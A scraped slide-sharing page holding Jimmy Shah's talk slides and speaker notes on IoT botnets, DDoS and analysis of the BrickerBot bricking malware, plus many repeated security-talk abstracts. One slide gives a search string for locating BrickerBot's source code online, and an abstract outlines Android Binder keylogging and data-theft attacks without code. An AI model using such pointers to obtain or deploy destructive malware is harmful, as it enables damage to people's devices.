Recently someone released a worm on the Internet that targeted IoT devices. In the past similar worms turned your Internet connected cameras and DVRs into nodes in a massive botnet. This time it used the same entry points into your devices to brick them. The better to prevent them from possibly being turned into weapons of mass denial of service.
We'll cover why that's a Bad Idea. And what are more constructive ways to get IoT/Internet-enabled embedded device manufacturers and vulnerability researchers to sit down at the same table.
THOTCON 0x6: Going Kinetic on Electronic Crime NetworksJohn Bambenek
Defensive security is a rat race. We detect new threats, we reverse engineer them and develop defenses while the bad guys just make new threats. We often just document a new threat and stop when the blog post is published. This talk will take it a step further on how to proactively disrupt threats and threat actors, not just from your organization but completely. As a case study, Operation Tovar and whatever else I take down between now and THOTCON will be used as examples of how this can be accomplished without a large legal team and without massive collateral damage (i.e. the No-IP incident). Tools will be demonstrated that are used for near-time surveillance of criminal networks.
Major security intrustions from businesses large and small, private and government, indicate that the Internet is far less secure than most realize. After reading this, you may want to reconsider how secure your private data and information really is.
Staying Ahead of Internet Background Exploitation - Microsoft BlueHat Israel ...Andrew Morris
It’s not just you. The frequency of severe vulnerabilities in internet-facing enterprise software being massively exploited at scale has increased drastically. The amount of time between disclosure and exploitation of these vulnerabilities has been reduced to near-zero, leaving defenders with less time to react and respond. While combating internet-wide opportunistic exploitation is a sprawling and complex problem, there is both an art and a science to staying ahead of large exploitation events such as Log4J.
In this talk we will share insights and challenges from operating a huge, shifting, adaptive, distributed sensor network listening to internet background noise and opportunistic exploitation traffic over the past four years. We will give a blunt state of the universe on mass exploitation. We will share patterns and unexplainable phenomena we’ve experienced across billions of internet scans. And we will make recommendations to defenders for preparing for the next time the cyber hits the fan.
Big Brother is watching. His name is Binder.
Binder is the only vehicle of inter process communication in Android, making it a prime target for attackers.
We'll provide a review of this sophisticated and little known mechanism, describe the multitude of dangers in its compromise and demonstrate several Binder-based data manipulation and theft attacks.
In depth (presentation outline):
* The Android malware world lags behind the PC in sophistication, but rapidly catching up. We believe the next generation of mobile malware is soon to come, and the Binder is a natural target.
* Binder Background (what makes it special?):
- The peculiarity of Android's architecture: on the idea of a userland OS built on top of the Linux kernel, and how Binder is critical to this concept.
- The inevitable security trade-off in Android: Minimizing the attack surface against the kernel, at the cost of introducing Binder as a classic single-point-of-control.
- How a developer sees the Binder (spoiler: he doesn't).
* In depth Binder mechanics (how does it work?):
- A detailed look at the data structures, classes and functions which define the behaviour of Binder, with a special focus on security-critical areas.
- Hooking Binder: How and where to control Android's IPC mechanism.
- Looking at the raw data travelling through Binder, and how to sift through it to find the interesting stuff (passwords, keyboard input, SMS, sound and many more).
- Why modern mobile AVs are having a hard time detecting these methods of operation.
* (Demonstrations) Comparing the "naive malware" approach and Man in the Binder philosophy to:
-> Logging keyboard input.
-> Capturing data sent between Activities.
-> Modifying sensitive information at runtime (i.e. faking a financial transaction, banking-trojan style).
* Mitigation:
- Why code obfuscation and app wrapping won't help you.
- Encrypting your data before it leaves the process (even within the same app!).
- Example: using an in-app keyboard securely.
We believe that this is ground-breaking work that has not been properly researched before: Binder’s central position in the Android architecture means that it is likely to become heavily attacked in the next few years. By shining a bright light on this topic, our research is a significant contribution to the security of the Android platform as a whole.
An earlier version of this research was presented at Black Hat Europe 2014 and Kaspersky SAS2015.
A white paper of the results up until a few months ago can be found here: https://www.blackhat.com/docs/eu-14/materials/eu-14-Artenstein-Man-In-The-Binder-He-Who-Controls-IPC-Controls-The-Droid.pdf
THOTCON 0x6: Going Kinetic on Electronic Crime NetworksJohn Bambenek
Defensive security is a rat race. We detect new threats, we reverse engineer them and develop defenses while the bad guys just make new threats. We often just document a new threat and stop when the blog post is published. This talk will take it a step further on how to proactively disrupt threats and threat actors, not just from your organization but completely. As a case study, Operation Tovar and whatever else I take down between now and THOTCON will be used as examples of how this can be accomplished without a large legal team and without massive collateral damage (i.e. the No-IP incident). Tools will be demonstrated that are used for near-time surveillance of criminal networks.
Major security intrustions from businesses large and small, private and government, indicate that the Internet is far less secure than most realize. After reading this, you may want to reconsider how secure your private data and information really is.
Staying Ahead of Internet Background Exploitation - Microsoft BlueHat Israel ...Andrew Morris
It’s not just you. The frequency of severe vulnerabilities in internet-facing enterprise software being massively exploited at scale has increased drastically. The amount of time between disclosure and exploitation of these vulnerabilities has been reduced to near-zero, leaving defenders with less time to react and respond. While combating internet-wide opportunistic exploitation is a sprawling and complex problem, there is both an art and a science to staying ahead of large exploitation events such as Log4J.
In this talk we will share insights and challenges from operating a huge, shifting, adaptive, distributed sensor network listening to internet background noise and opportunistic exploitation traffic over the past four years. We will give a blunt state of the universe on mass exploitation. We will share patterns and unexplainable phenomena we’ve experienced across billions of internet scans. And we will make recommendations to defenders for preparing for the next time the cyber hits the fan.
Big Brother is watching. His name is Binder.
Binder is the only vehicle of inter process communication in Android, making it a prime target for attackers.
We'll provide a review of this sophisticated and little known mechanism, describe the multitude of dangers in its compromise and demonstrate several Binder-based data manipulation and theft attacks.
In depth (presentation outline):
* The Android malware world lags behind the PC in sophistication, but rapidly catching up. We believe the next generation of mobile malware is soon to come, and the Binder is a natural target.
* Binder Background (what makes it special?):
- The peculiarity of Android's architecture: on the idea of a userland OS built on top of the Linux kernel, and how Binder is critical to this concept.
- The inevitable security trade-off in Android: Minimizing the attack surface against the kernel, at the cost of introducing Binder as a classic single-point-of-control.
- How a developer sees the Binder (spoiler: he doesn't).
* In depth Binder mechanics (how does it work?):
- A detailed look at the data structures, classes and functions which define the behaviour of Binder, with a special focus on security-critical areas.
- Hooking Binder: How and where to control Android's IPC mechanism.
- Looking at the raw data travelling through Binder, and how to sift through it to find the interesting stuff (passwords, keyboard input, SMS, sound and many more).
- Why modern mobile AVs are having a hard time detecting these methods of operation.
* (Demonstrations) Comparing the "naive malware" approach and Man in the Binder philosophy to:
-> Logging keyboard input.
-> Capturing data sent between Activities.
-> Modifying sensitive information at runtime (i.e. faking a financial transaction, banking-trojan style).
* Mitigation:
- Why code obfuscation and app wrapping won't help you.
- Encrypting your data before it leaves the process (even within the same app!).
- Example: using an in-app keyboard securely.
We believe that this is ground-breaking work that has not been properly researched before: Binder’s central position in the Android architecture means that it is likely to become heavily attacked in the next few years. By shining a bright light on this topic, our research is a significant contribution to the security of the Android platform as a whole.
An earlier version of this research was presented at Black Hat Europe 2014 and Kaspersky SAS2015.
A white paper of the results up until a few months ago can be found here: https://www.blackhat.com/docs/eu-14/materials/eu-14-Artenstein-Man-In-The-Binder-He-Who-Controls-IPC-Controls-The-Droid.pdf
Cyber Analysts: who they are, what they do, where they are - Marco Ramilli - ...Codemotion
Cyber security is one of the most challenging topic in the current era. Cyber attacks are becoming day by day more sophisticated and difficult to be detected by automated systems. People who understand cyber threats and act to block cyber attacks are defined as cyber analysts. But what do they really do ? What dificulties do they meet and what background should they have before starting the "neverending" "cyber security" learning path ? Why is not enough an automated system ? Marco will talk about real experiences on the cyber analyst field.
Zero Privilege Architectures v1.1_for distribution.pdfThijs Ebbers
"Zero Privilege: "Platform Thinking" meets "Secure-by-Design" meets "Secure-by-Default". In this talk Diana and Thijs use several lessons from history to explain what risks are typically overlooked in many IT implementations and explain what ING has done (and encourages others to do) to defend against todays IT Adversaries. Additionally some very practical advices are included to help others embark on a "Zero Privilege" journey. And the talk concludes with some urgent guidance from several well known governmental cybersecurity bodies."
Cyber Analysts: who they are, what they do, where they are - Marco Ramilli - ...Codemotion
Cyber security is one of the most challenging topics in the current era. Cyber attacks are becoming day by day more sophisticated and difficult to be detected by automated systems. People who understand cyber threats and act to block cyber attacks are defined as cyber analysts. But what do they really do? What difficulties do they meet and what background should they have before starting the "neverending" "cyber security" learning path? Why is not enough an automated system? Marco will talk about real experiences on the cyber analyst field.
Presentation by Haroon Meer at IDC in 2006.
The presentation begins with a discussion on google hacking. There is a brief discussion on Kernel-rootkits. The presentation ends with a discussion
on web application hacking.
[2010 CodeEngn Conference 04] Max - Fighting against BotnetGangSeok Lee
2010 CodeEngn Conference 04
사이버 전쟁의 대표적 공격 무기가 되어버린 봇넷은 네트워크가 점점 초고속화되고, 복잡해진 상황속에서 7.7 DDoS와 같은 DDoS 공격, 인터넷 계정이나 금융 정보등과 같은 개인 정보 유출 등이 봇넷을 통해 이루어지고 있는 상황이다. 이에 해당 주제 발표에서는 실제 사이버상에서 운영되고 있는 봇넷들을 분석해 보며, 그들의 추구하는 봇넷 비즈니스 모델을 찾아보려 한다. 또한, 봇넷의 설계, 운영, 관리, 대응에 관한 시연 그리고 봇넷들간의 전쟁에 대해 이야기하고자 한다.
http://codeengn.com/conference/04
N. Oskina, G. Asproni - Be your own Threatbuster! - Codemotion Milan 2018Codemotion
Creating a quality web application is hard. It’s hard to gain customers, it’s hard to build your reputation and it’s hard to keep the costs low. Nevertheless, security is often an afterthought. However… Have you considered the cost of fixing security issues later? What about the reputational damage of a security breach? Are you worried about your customers’ data? We will talk about good security coding practices for web applications and how to apply them early on using some real world examples. We will also help you to think about your website’s vulnerabilities from the view of a hacker.
Release The Hounds: Part 2 “11 Years Is A Long Ass Time”Casey Ellis
Bugcrowd was founded at an inflection point in the history of the Internet and awareness of cybersecurity. A lot has changed since 2012 - to the cybersecurity industry, to the technology landscape, to the view of hackers as helpful and not just harmful, and - importantly - to the awareness of cybersecurity as "everyone's problem".
In 2023, we find ourselves at a similar inflection point for our space. This keynote unpacks the last 11 years as a predictor of what is next, and as an encouragement and roadmap for budding cybersecurity entrepreneurs and solutioneers.
The Hardcore Stuff I Hack:
This talk is going to give a run through of some of the technical challenges paul and his team have overcome over the years - in as much hardcore detail as possible
12 Years and a Baker's Dozen - Lessons and Learnings from my Infosec JourneySaumil Shah
I started my company, Net-Square, 12 years ago. This talk is a collection of 13 thoughts and observations from the past 12 years - some technical, some philosophical and some pointed questions for all of us to reflect upon. I would like to talk about my journey in the information security industry, from the fledgling years in the late 90s where I was still entrenched in academia to the present day where infosec is redefining the world's political boundaries, literally and figuratively. This talk is not a rant, not a venting session and certainly not a criticism of sorts as many infosec talks have now become.
Using big data and implementing hadoop is a trend that people jump all to quickly to. Instead understanding the run time complexity of one's algorithms, reducing said complexity and managing the process from start to finish in a lean and agile way can yield massive cost savings - or save your organization.
There's no S(ecurity) in IoT: This is why we can't sleepJimmy Shah
IoT devices are embedded systems. Essentially "[a] computer small enough to fit in a pocket". One wouldn’t put a computer on the Internet without at least considering securing it, yet security for IoT devices is quite often an afterthought.
BYOD is now BYOT (Bring Your Own Threat) – Current Trends in Mobile APTJimmy Shah
Mobile devices are not simply PCs. While one knows to look for an Advanced Persistent Threat(APT) on their desktop endpoints, mobile tends to be ignored. Setting up an MDM solution is not enough. Installing AV on as many devices as possible is not enough. The holes in the net are still too wide; attackers have more options than just malicious apps for getting on your network.
Topics covered will be:
How attackers are moving to mobile in order to bypass traditional protection.
Apps are only one part of the problem. Documents, email, messaging are still left wide open
Bypassing Mobile Antivirus
Bypassing MDM, MAM and Containers
Attackers are turning from apps to exploits.
Finally we’ll cover what to do next – how to effectively deal with Mobile APT.
More Related Content
Similar to Brick all the internet of things!(with notes)
Cyber Analysts: who they are, what they do, where they are - Marco Ramilli - ...Codemotion
Cyber security is one of the most challenging topic in the current era. Cyber attacks are becoming day by day more sophisticated and difficult to be detected by automated systems. People who understand cyber threats and act to block cyber attacks are defined as cyber analysts. But what do they really do ? What dificulties do they meet and what background should they have before starting the "neverending" "cyber security" learning path ? Why is not enough an automated system ? Marco will talk about real experiences on the cyber analyst field.
Zero Privilege Architectures v1.1_for distribution.pdfThijs Ebbers
"Zero Privilege: "Platform Thinking" meets "Secure-by-Design" meets "Secure-by-Default". In this talk Diana and Thijs use several lessons from history to explain what risks are typically overlooked in many IT implementations and explain what ING has done (and encourages others to do) to defend against todays IT Adversaries. Additionally some very practical advices are included to help others embark on a "Zero Privilege" journey. And the talk concludes with some urgent guidance from several well known governmental cybersecurity bodies."
Cyber Analysts: who they are, what they do, where they are - Marco Ramilli - ...Codemotion
Cyber security is one of the most challenging topics in the current era. Cyber attacks are becoming day by day more sophisticated and difficult to be detected by automated systems. People who understand cyber threats and act to block cyber attacks are defined as cyber analysts. But what do they really do? What difficulties do they meet and what background should they have before starting the "neverending" "cyber security" learning path? Why is not enough an automated system? Marco will talk about real experiences on the cyber analyst field.
Presentation by Haroon Meer at IDC in 2006.
The presentation begins with a discussion on google hacking. There is a brief discussion on Kernel-rootkits. The presentation ends with a discussion
on web application hacking.
[2010 CodeEngn Conference 04] Max - Fighting against BotnetGangSeok Lee
2010 CodeEngn Conference 04
사이버 전쟁의 대표적 공격 무기가 되어버린 봇넷은 네트워크가 점점 초고속화되고, 복잡해진 상황속에서 7.7 DDoS와 같은 DDoS 공격, 인터넷 계정이나 금융 정보등과 같은 개인 정보 유출 등이 봇넷을 통해 이루어지고 있는 상황이다. 이에 해당 주제 발표에서는 실제 사이버상에서 운영되고 있는 봇넷들을 분석해 보며, 그들의 추구하는 봇넷 비즈니스 모델을 찾아보려 한다. 또한, 봇넷의 설계, 운영, 관리, 대응에 관한 시연 그리고 봇넷들간의 전쟁에 대해 이야기하고자 한다.
http://codeengn.com/conference/04
N. Oskina, G. Asproni - Be your own Threatbuster! - Codemotion Milan 2018Codemotion
Creating a quality web application is hard. It’s hard to gain customers, it’s hard to build your reputation and it’s hard to keep the costs low. Nevertheless, security is often an afterthought. However… Have you considered the cost of fixing security issues later? What about the reputational damage of a security breach? Are you worried about your customers’ data? We will talk about good security coding practices for web applications and how to apply them early on using some real world examples. We will also help you to think about your website’s vulnerabilities from the view of a hacker.
Release The Hounds: Part 2 “11 Years Is A Long Ass Time”Casey Ellis
Bugcrowd was founded at an inflection point in the history of the Internet and awareness of cybersecurity. A lot has changed since 2012 - to the cybersecurity industry, to the technology landscape, to the view of hackers as helpful and not just harmful, and - importantly - to the awareness of cybersecurity as "everyone's problem".
In 2023, we find ourselves at a similar inflection point for our space. This keynote unpacks the last 11 years as a predictor of what is next, and as an encouragement and roadmap for budding cybersecurity entrepreneurs and solutioneers.
The Hardcore Stuff I Hack:
This talk is going to give a run through of some of the technical challenges paul and his team have overcome over the years - in as much hardcore detail as possible
12 Years and a Baker's Dozen - Lessons and Learnings from my Infosec JourneySaumil Shah
I started my company, Net-Square, 12 years ago. This talk is a collection of 13 thoughts and observations from the past 12 years - some technical, some philosophical and some pointed questions for all of us to reflect upon. I would like to talk about my journey in the information security industry, from the fledgling years in the late 90s where I was still entrenched in academia to the present day where infosec is redefining the world's political boundaries, literally and figuratively. This talk is not a rant, not a venting session and certainly not a criticism of sorts as many infosec talks have now become.
Using big data and implementing hadoop is a trend that people jump all to quickly to. Instead understanding the run time complexity of one's algorithms, reducing said complexity and managing the process from start to finish in a lean and agile way can yield massive cost savings - or save your organization.
Similar to Brick all the internet of things!(with notes) (20)
There's no S(ecurity) in IoT: This is why we can't sleepJimmy Shah
IoT devices are embedded systems. Essentially "[a] computer small enough to fit in a pocket". One wouldn’t put a computer on the Internet without at least considering securing it, yet security for IoT devices is quite often an afterthought.
BYOD is now BYOT (Bring Your Own Threat) – Current Trends in Mobile APTJimmy Shah
Mobile devices are not simply PCs. While one knows to look for an Advanced Persistent Threat(APT) on their desktop endpoints, mobile tends to be ignored. Setting up an MDM solution is not enough. Installing AV on as many devices as possible is not enough. The holes in the net are still too wide; attackers have more options than just malicious apps for getting on your network.
Topics covered will be:
How attackers are moving to mobile in order to bypass traditional protection.
Apps are only one part of the problem. Documents, email, messaging are still left wide open
Bypassing Mobile Antivirus
Bypassing MDM, MAM and Containers
Attackers are turning from apps to exploits.
Finally we’ll cover what to do next – how to effectively deal with Mobile APT.
Solar Powered Parking Meters - An IoT thought experimentJimmy Shah
The Internet of Things is not as complex as one would think. Objects(e.g. Power meters, Fridge computers, etc.) or "Things" don;t have their own Internet, instead they "speak" to each other over the same Internet we all use. There lies their vulnerability. Assuming that since the machines will only talk to each other, that no one will eavesdrop or intrude on their conversation. Security researchers have a saying, "Security through Obscurity is no Security".
The presentation shows how the Internet of Things' veil of obscurity can be pierced by an attacker(or more likely a Security Researcher) would assess a particular Smart Parking Meter ecosystem. Only open source intelligence(OSINT)[e.g. patents, newspaper articles] was used to compile the information on:
* parking meters
* mesh networking
* machine2machine(m2m) SIMs
* management consoles
* RF usage
Viruses on mobile platforms why we don't/don't we have viruses on android_Jimmy Shah
This presentation will discuss the resources available to attackers to write Android viruses, including methods of infecting executables, gaining control from the original app and avoiding detection.
Mobile malware heuristics the path from 'eh' to pretty good'Jimmy Shah
The 'Platypus' talk
Malware on mobile phones is rapidly increasing. There are many reasons for this, but the primary one is the ease of monetizing malware on mobile phones, Attackers are incentivized to create more malware faster and cheaper. They are overwhelming the limited resources of malware researchers with this glut of cheap and "good enough" malware. Malware can be identified by humans, but there is insufficient time to handle all that is released daily by malware writers. There is a need to develop both better heuristics and the tools that let an analyst separate the wheat from the chaff. The presentation will cover not just the development of heuristics for mobile malware, but also its path from simple detection to more advanced and more successful(i.e fewer false positives) detection. Along the way we will cover the missteps and pitfalls that slow the development of automation.
Isn't it all just SMS-sending trojans?: Real Advances in Android MalwareJimmy Shah
Attackers are starting to move on from simple attacks, mainly because users are starting to figure out that the free adult entertainment or chat app shouldn't be sending SMS messages to expensive numbers. They're leveraging techniques from PC malware like server-side polymorphism, vulnerability exploits, botnets and network updates, and preemptive/direct attacks against security software.
Smartphone Ownage: The state of mobile botnets and rootkitsJimmy Shah
Symbian Botnet? Mobile Linux Rootkits? iPhone Botnets? Millions of phones at risk? The press coverage on smart phone threats is at times somewhat accurate, distant, and occasionally (if unintentionally) misleading. They tend to raise questions such as: How close to PC levels (100,000+ to millions of nodes) have mobile botnets reached? Have mobile rootkits reached the complexity of those on the PC?
This talk covered the state of rootkits and botnets on smart phones from the perspective of anti-malware researchers, including demystification of the threat from mobile rootkits and mobile botnets, the differences (if any) between mobile rootkits and mobile botnets vs. their PC counterparts, and a look at how samples seen in the wild and researcher PoCs function.
GraphSummit Singapore | The Art of the Possible with Graph - Q2 2024Neo4j
Neha Bajwa, Vice President of Product Marketing, Neo4j
Join us as we explore breakthrough innovations enabled by interconnected data and AI. Discover firsthand how organizations use relationships in data to uncover contextual insights and solve our most pressing challenges – from optimizing supply chains, detecting fraud, and improving customer experiences to accelerating drug discoveries.
In his public lecture, Christian Timmerer provides insights into the fascinating history of video streaming, starting from its humble beginnings before YouTube to the groundbreaking technologies that now dominate platforms like Netflix and ORF ON. Timmerer also presents provocative contributions of his own that have significantly influenced the industry. He concludes by looking at future challenges and invites the audience to join in a discussion.
A tale of scale & speed: How the US Navy is enabling software delivery from l...sonjaschweigert1
Rapid and secure feature delivery is a goal across every application team and every branch of the DoD. The Navy’s DevSecOps platform, Party Barge, has achieved:
- Reduction in onboarding time from 5 weeks to 1 day
- Improved developer experience and productivity through actionable findings and reduction of false positives
- Maintenance of superior security standards and inherent policy enforcement with Authorization to Operate (ATO)
Development teams can ship efficiently and ensure applications are cyber ready for Navy Authorizing Officials (AOs). In this webinar, Sigma Defense and Anchore will give attendees a look behind the scenes and demo secure pipeline automation and security artifacts that speed up application ATO and time to production.
We will cover:
- How to remove silos in DevSecOps
- How to build efficient development pipeline roles and component templates
- How to deliver security artifacts that matter for ATO’s (SBOMs, vulnerability reports, and policy evidence)
- How to streamline operations with automated policy checks on container images
DevOps and Testing slides at DASA ConnectKari Kakkonen
My and Rik Marselis slides at 30.5.2024 DASA Connect conference. We discuss about what is testing, then what is agile testing and finally what is Testing in DevOps. Finally we had lovely workshop with the participants trying to find out different ways to think about quality and testing in different parts of the DevOps infinity loop.
Essentials of Automations: The Art of Triggers and Actions in FMESafe Software
In this second installment of our Essentials of Automations webinar series, we’ll explore the landscape of triggers and actions, guiding you through the nuances of authoring and adapting workspaces for seamless automations. Gain an understanding of the full spectrum of triggers and actions available in FME, empowering you to enhance your workspaces for efficient automation.
We’ll kick things off by showcasing the most commonly used event-based triggers, introducing you to various automation workflows like manual triggers, schedules, directory watchers, and more. Plus, see how these elements play out in real scenarios.
Whether you’re tweaking your current setup or building from the ground up, this session will arm you with the tools and insights needed to transform your FME usage into a powerhouse of productivity. Join us to discover effective strategies that simplify complex processes, enhancing your productivity and transforming your data management practices with FME. Let’s turn complexity into clarity and make your workspaces work wonders!
Unlocking Productivity: Leveraging the Potential of Copilot in Microsoft 365, a presentation by Christoforos Vlachos, Senior Solutions Manager – Modern Workplace, Uni Systems
Sudheer Mechineni, Head of Application Frameworks, Standard Chartered Bank
Discover how Standard Chartered Bank harnessed the power of Neo4j to transform complex data access challenges into a dynamic, scalable graph database solution. This keynote will cover their journey from initial adoption to deploying a fully automated, enterprise-grade causal cluster, highlighting key strategies for modelling organisational changes and ensuring robust disaster recovery. Learn how these innovations have not only enhanced Standard Chartered Bank’s data infrastructure but also positioned them as pioneers in the banking sector’s adoption of graph technology.
GridMate - End to end testing is a critical piece to ensure quality and avoid...ThomasParaiso2
End to end testing is a critical piece to ensure quality and avoid regressions. In this session, we share our journey building an E2E testing pipeline for GridMate components (LWC and Aura) using Cypress, JSForce, FakerJS…
UiPath Test Automation using UiPath Test Suite series, part 6DianaGray10
Welcome to UiPath Test Automation using UiPath Test Suite series part 6. In this session, we will cover Test Automation with generative AI and Open AI.
UiPath Test Automation with generative AI and Open AI webinar offers an in-depth exploration of leveraging cutting-edge technologies for test automation within the UiPath platform. Attendees will delve into the integration of generative AI, a test automation solution, with Open AI advanced natural language processing capabilities.
Throughout the session, participants will discover how this synergy empowers testers to automate repetitive tasks, enhance testing accuracy, and expedite the software testing life cycle. Topics covered include the seamless integration process, practical use cases, and the benefits of harnessing AI-driven automation for UiPath testing initiatives. By attending this webinar, testers, and automation professionals can gain valuable insights into harnessing the power of AI to optimize their test automation workflows within the UiPath ecosystem, ultimately driving efficiency and quality in software development processes.
What will you get from this session?
1. Insights into integrating generative AI.
2. Understanding how this integration enhances test automation within the UiPath platform
3. Practical demonstrations
4. Exploration of real-world use cases illustrating the benefits of AI-driven test automation for UiPath
Topics covered:
What is generative AI
Test Automation with generative AI and Open AI.
UiPath integration with generative AI
Speaker:
Deepak Rai, Automation Practice Lead, Boundaryless Group and UiPath MVP
GDG Cloud Southlake #33: Boule & Rebala: Effective AppSec in SDLC using Deplo...James Anderson
Effective Application Security in Software Delivery lifecycle using Deployment Firewall and DBOM
The modern software delivery process (or the CI/CD process) includes many tools, distributed teams, open-source code, and cloud platforms. Constant focus on speed to release software to market, along with the traditional slow and manual security checks has caused gaps in continuous security as an important piece in the software supply chain. Today organizations feel more susceptible to external and internal cyber threats due to the vast attack surface in their applications supply chain and the lack of end-to-end governance and risk management.
The software team must secure its software delivery process to avoid vulnerability and security breaches. This needs to be achieved with existing tool chains and without extensive rework of the delivery processes. This talk will present strategies and techniques for providing visibility into the true risk of the existing vulnerabilities, preventing the introduction of security issues in the software, resolving vulnerabilities in production environments quickly, and capturing the deployment bill of materials (DBOM).
Speakers:
Bob Boule
Robert Boule is a technology enthusiast with PASSION for technology and making things work along with a knack for helping others understand how things work. He comes with around 20 years of solution engineering experience in application security, software continuous delivery, and SaaS platforms. He is known for his dynamic presentations in CI/CD and application security integrated in software delivery lifecycle.
Gopinath Rebala
Gopinath Rebala is the CTO of OpsMx, where he has overall responsibility for the machine learning and data processing architectures for Secure Software Delivery. Gopi also has a strong connection with our customers, leading design and architecture for strategic implementations. Gopi is a frequent speaker and well-known leader in continuous delivery and integrating security into software delivery.
Alt. GDG Cloud Southlake #33: Boule & Rebala: Effective AppSec in SDLC using ...James Anderson
Effective Application Security in Software Delivery lifecycle using Deployment Firewall and DBOM
The modern software delivery process (or the CI/CD process) includes many tools, distributed teams, open-source code, and cloud platforms. Constant focus on speed to release software to market, along with the traditional slow and manual security checks has caused gaps in continuous security as an important piece in the software supply chain. Today organizations feel more susceptible to external and internal cyber threats due to the vast attack surface in their applications supply chain and the lack of end-to-end governance and risk management.
The software team must secure its software delivery process to avoid vulnerability and security breaches. This needs to be achieved with existing tool chains and without extensive rework of the delivery processes. This talk will present strategies and techniques for providing visibility into the true risk of the existing vulnerabilities, preventing the introduction of security issues in the software, resolving vulnerabilities in production environments quickly, and capturing the deployment bill of materials (DBOM).
Speakers:
Bob Boule
Robert Boule is a technology enthusiast with PASSION for technology and making things work along with a knack for helping others understand how things work. He comes with around 20 years of solution engineering experience in application security, software continuous delivery, and SaaS platforms. He is known for his dynamic presentations in CI/CD and application security integrated in software delivery lifecycle.
Gopinath Rebala
Gopinath Rebala is the CTO of OpsMx, where he has overall responsibility for the machine learning and data processing architectures for Secure Software Delivery. Gopi also has a strong connection with our customers, leading design and architecture for strategic implementations. Gopi is a frequent speaker and well-known leader in continuous delivery and integrating security into software delivery.
Epistemic Interaction - tuning interfaces to provide information for AI supportAlan Dix
Paper presented at SYNERGY workshop at AVI 2024, Genoa, Italy. 3rd June 2024
https://alandix.com/academic/papers/synergy2024-epistemic/
As machine learning integrates deeper into human-computer interactions, the concept of epistemic interaction emerges, aiming to refine these interactions to enhance system adaptability. This approach encourages minor, intentional adjustments in user behaviour to enrich the data available for system learning. This paper introduces epistemic interaction within the context of human-system communication, illustrating how deliberate interaction design can improve system understanding and adaptation. Through concrete examples, we demonstrate the potential of epistemic interaction to significantly advance human-computer interaction by leveraging intuitive human communication strategies to inform system design and functionality, offering a novel pathway for enriching user-system engagements.
Free Complete Python - A step towards Data Science
Brick all the internet of things!(with notes)
1. Brick all the Internet of Things!!:
We want to make things more secure, right?
Jimmy Shah
2. Disclaimers
● The views, opinions, and positions expressed in this
presentation are solely those of the author
● They do not necessarily represent the views and
opinions of my employer and do not constitute or imply
any endorsement or recommendation from my
employer
3. Ultimately, what’s going with these IoT botnets is crime.
People are talking about these cybersecurity problems —
problems with the devices, etc. — but at the end of the day
it’s crime and private citizens don’t have the power to make
these bad actors stop.
— Allison Nixon,
Director of Security Research
Flashpoint
Krebs, Brian. "Krebs on Security." January 18, 2018. Accessed January 24, 2018.
https://krebsonsecurity.com/2018/01/expert-iot-botnets-the-work-of-a-vast-minority/.
4. DDOS
● Traditional
○ What’s a bot?
■ Robots, zombies, etc.
■ Nodes in a network of malicious machines
○ Attacker convinces/infects normal users to become bots
○ Attacker sends commands to DOS a victim site
○ Profit
● Also Traditional, but DOSaaS
○ Attacker buys/rents bots
○ Same as the above
5. DDOS via IoT Botnet
● Similar to DDOSaaS
○ Except the bots are free
■ Even more free? Due to default creds.
Mirai
Linux.Wifatch Linux.Hajime
8. So, Brickerbot?
● What’s bricking?
○ Turning a useful device into something as useful as a ‘brick’
9. Brickerbot: source code
● Want a copy of Brickerbot?
○ Google
■ “if 57 - 57: O0oo0OOOOO00 . Oo0 + IIiIii1iI * OOOoOooO . o0ooO * i1”
● Mirrored on github and various pastebin like sites
10. Aside: Malware analysis process - under pressure
● Not always enough time
○ fully unwind and solve every aspect of every puzzle within a sample
■ That’s called ‘vacation’
● Interested parties breathing down analysts’ necks
○ Customers, bosses, competitors, press
■ Handling these is ‘the job’
● Identify IOCs(Indicators of Compromise)
○ What is the least I need to see before I know my home/office/business is irrecoverable?
11. Brickerbot: Getting to the heart of the issue
● Malware analysis
○ Get it running(VM, python(s), no network)
■ Nope, bad interp. Python2
■ Nope, symbol not found. ‘Extra’ whitespace.
■ Nope, libraries not imported. Enough nonsense.
○ De-obfuscate
■ Write custom deobfuscator. Nope, that’s a ‘vacation’ project; see ‘the job’.
● (still, become friends with tokenizer.py)
■ Custom script to remove dead code
● Become friends with PyLint
■ Pretty-print remainder of source
12. Brickerbot: Getting to the heart of the issue,cont.
● Malware analysis
○ Examine low-hanging fruit
■ Strings
● Seriously
● First step used by malware analysts
■ Read reports by other analysts
● Catch what you missed/ran out of time to find
● Re-prioritize resources towards areas that have greatest impact
21. Security: Gaining industry buy-in; Doing it right
1. Get someone credible to organize/liaise with industry players
a. Renderman
2. Provide guidelines for disclosure to vendors
3. Provide guidelines for communication with researchers
4. Suggest/provide solutions
a. Mostly suggest. Nobody’s using provided code.
5. Branding
a. Internet of Dongs Project
b. DVEs(Dong Vulnerability and Exposures)
23. Brick all the Internet of Things!!:
We want to make things more secure, right?
Jimmy Shah
24. Disclaimers
● The views, opinions, and positions expressed in this
presentation are solely those of the author
● They do not necessarily represent the views and
opinions of my employer and do not constitute or imply
any endorsement or recommendation from my
employer
25. Nixon is a great security researcher and I agree wholeheartedly with the first half of this
statement. Attackers are using botnets primarily for profit. Distributed Denial of
Service(DDOS) as a primary source of income.
I respectfully disagree with the idea that the only solution is to turn to law enforcement.
Unfortunately while Law enforcement has great powers of investigation and
response after the fact, there are still a number of steps we can take to prevent
attacks.
Ultimately, what’s going with these IoT botnets is crime.
People are talking about these cybersecurity problems —
problems with the devices, etc. — but at the end of the day
it’s crime and private citizens don’t have the power to make
these bad actors stop.
— Allison Nixon,
Director of Security Research
Flashpoint
Krebs, Brian. "Krebs on Security." January 18, 2018. Accessed January 24, 2018.
https://krebsonsecurity.com/2018/01/expert-iot-botnets-the-work-of-a-vast-minority/.
26. Attackers exploiting botnets to perform large scale DDOSes has become common. Bots,
or Robots or Zombies, whatever are nodes in a network of malicious machines.
Traditionally attackers either infected machines with malware or on a less automated
fashion convince users to perform like bots.
LOIC is an example of software that allows users to participate in a DDOS. This is the
simplest technique where each user is independent but collaborates with a multitude
of like minded users. Imagine a hundred thousand individuals each with a single rifle
all aiming at the same target. Some will miss. Some rifles will misfire. Some will
never understand how to fire a bullet. Regardless a majority will hit the target. Of
course the efficiency of such an attack is much less than one that eliminates human
error.
Infecting numerous bots is sometimes only the first step. An attacker with hundreds of
thousands or millions of bots needs to do something with them. They make no
money lying idle. This is where another traditional technique is used, DOSaaS(Denial
of Service as a Service). I have a botnet, you pay me to take your target down, we
all profit. Except the major site we’ve just knocked down.
DDOS
● Traditional
○ What’s a bot?
■ Robots, zombies, etc.
■ Nodes in a network of malicious machines
